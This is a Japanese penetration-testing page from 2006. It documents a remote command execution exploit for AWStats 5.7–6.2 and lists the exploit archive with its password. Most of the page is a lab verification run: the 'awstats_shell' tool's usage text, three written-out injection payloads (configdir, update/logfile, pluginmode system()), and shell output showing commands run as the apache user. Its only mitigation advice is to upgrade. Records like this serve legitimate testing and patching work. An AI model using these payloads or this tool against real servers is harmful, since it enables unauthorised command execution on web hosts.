目次
AWStats 5.7 - 6.2 Multiple Remote Exploit
更新履歴
- 2006/02/16 初版
- Author kikuzou
概要
- AWStatsの configdir の脆弱性を使用したExploit。
- Webサーバ特権の下で任意のコマンドを実行できる。
- 2005/01/17 公開
影響を受けるシステム
- AWStats 5.7 ~ 6.2
添付ファイル
| files | password |
|---|---|
| awstats_shell.zip | pen-test |
参考URL
Exploitの検証
検証環境
- CentOS 4.2
- AWStats 6.2
検証結果
- 攻撃先Webサーバの AWStats のパスは「http://192.168.1.20/awstats/awstats.pl」
- 以下コマンドを実行する。
# ./awstats_shell
Usage: ./awstats_shell [options] <host>
Options:
-d <awstats_dir> directory of awstats script
'/cgi-bin/awstats.pl' is default
if no directory is specified
-v verbose mode (optional)
example: ./awstats_shell -d /stats/awstats.pl website.com
#
# ./awstats_shell -d /awstats/awstats.pl 192.168.1.20
Awstats 5.7 - 6.2 exploit Shell 0.1
code by omin0us
dtors security group
.: http://dtors.ath.cx :.
--------------------------------------
select exploit method:
1. ?configdir=|cmd}
2. ?update=1&logfile=|cmd|
3. ?pluginmode=:system("cmd");
method [1/2/3]? 1 or 3
starting shell...
(ctrl+c to exit)
sh3ll>
uid=501(apache) gid=501(apache) groups=501(apache)
DTORS_STOP
sh3ll> whoami
apache
DTORS_STOP
sh3ll> uname -a
Linux centos 2.6.9-22.EL #1 Sat Oct 8 17:48:27 CDT 2005 i686 i686 i386 GNU/Linux
DTORS_STOP
sh3ll>
Ctrl + C で終了
#
対処方法
- AWStats のバージョンアップ
